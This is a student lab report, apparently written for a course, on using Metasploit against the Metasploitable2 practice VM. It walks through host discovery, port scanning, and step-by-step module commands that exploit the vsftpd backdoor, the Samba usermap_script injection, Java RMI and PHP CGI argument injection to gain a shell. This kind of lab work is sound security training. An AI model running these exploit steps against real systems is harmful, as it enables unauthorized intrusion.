1.實驗內容
掌握metasploit的用法。
下載官方靶機Metasploitable2,完成下面實驗內容。
(1)前期滲透
①主機發現(可用Aux中的arp_sweep,search一下就可以use)
②埠掃描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③選做:也可以掃系統版本、漏洞等。
(2)Vsftpd原始碼包後門漏洞(21埠)
(3)SambaMS-RPC Shell命令注入漏洞(埠139)
(4)Java RMI SERVER命令執行漏洞(1099埠)
(5)PHP CGI引數執行注入漏洞(80埠)
2.實驗過程
下載過程參照官方指導書,此處不再贅述。
(1)前期滲透
①主機發現:
先檢查主機是否能ping通靶機:
檢視靶機ip地址:
用主機ping靶機:
進入msfconsole控制檯:
使用search arp_sweep進行搜尋:
use 0後檢視所需引數,show options:
設定靶機IP:set rhosts 192.168.1.102
執行run:
掃描到了靶機
②埠掃描:
使用portscan:
search portscan/tcp,use 0後show options:
設定目的埠、靶機IP等引數後執行:
掃描到了0-65535中的以下埠:
③掃描目標http伺服器的版本資訊:
use auxiliary/scanner/http/http_version,set RHOST 192.168.1.102,然後run:
(2)Vsftpd原始碼包後門漏洞(21埠)
漏洞原理:在特定版本的vsftpd伺服器程式中,被人惡意植入程式碼,當使用者名稱以“😃”為結尾,伺服器就會在6200埠監聽,並且能夠執行任意程式碼。
利用步驟:
在kali中執行msfconsole 啟動metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 選擇漏洞:
set RHOST 192.168.1.102 設定要攻擊的機器IP(靶機IP):
exploit/run 開始攻擊
利用成功,執行uname –a、 pwd、 id等命令 驗證
(3)SambaMS-RPC Shell命令注入漏洞(埠139)
漏洞原理:Samba中負責在SAM資料庫更新使用者口令的程式碼未經過濾便將使用者輸入傳輸給了/bin/sh。如果在呼叫smb.conf中定義的外部指令碼時,透過對/bin/sh的MS-RPC呼叫提交了惡意輸入的話,就可能允許攻擊者以nobody使用者的許可權執行任意命令。
use exploit/multi/samba/usermap_script 選擇漏洞:
set RHOST 192.168.1.102設定要攻擊的機器IP(靶機IP):
exploit 開始攻擊
利用成功 執行uname–a驗證:
(4)Java RMI SERVER命令執行漏洞(1099埠)
漏洞原理:Java RMI Server的RMI登錄檔和RMI啟用服務的預設配置存在安全漏洞,可被利用導致程式碼執行。
操作步驟:
首先檢視1099埠是否開啟。
然後在MSF中:
use exploit/multi/misc/java_rmi_server
show options 檢視配置引數
set RHOST (靶機IP) 192.168.1.102
exploit/run
sessions -i id
shell (進入meterpreter時,使用whoami驗證下)
(5)PHP CGI引數執行注入漏洞(80埠)
漏洞原理:CGI指令碼沒有正確處理請求引數,導致原始碼洩露,允許遠端攻擊者在請求引數中插入執行命令。
在kali中執行msfconsole,啟動metasploit
use exploit/multi/http/php_cgi_arg_injection 選擇漏洞
set RHOST 192.168.1.102 設定要攻擊的機器IP
exploit/run 開始攻擊
shell後ls進行驗證:
3.問題及解決方案
- 問題1:第四步whoami驗證時顯示命令不存在
- 問題1解決方案:whoami這個命令只在shell中存在,之前我是把shell關了所以不能用whoami
4.學習感悟、思考等
透過本次Metasploit的實踐學習,我深刻體會到了滲透測試的重要性以及Metasploit在其中的強大作用。從主機發現到埠掃描,再到具體漏洞的利用,每一步都讓我對網路安全有了更深入的理解。特別是在利用Vsftpd後門漏洞、Samba MS-RPC漏洞、Java RMI SERVER漏洞以及PHP CGI引數執行注入漏洞時,我深刻感受到了攻擊者可能利用的多種途徑和手法。同時,我也意識到,網路安全需要不斷學習和更新知識,以應對不斷變化的威脅環境。這次實踐不僅提升了我的技術能力,更讓我對網路安全有了更加全面的認識。
參考資料
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/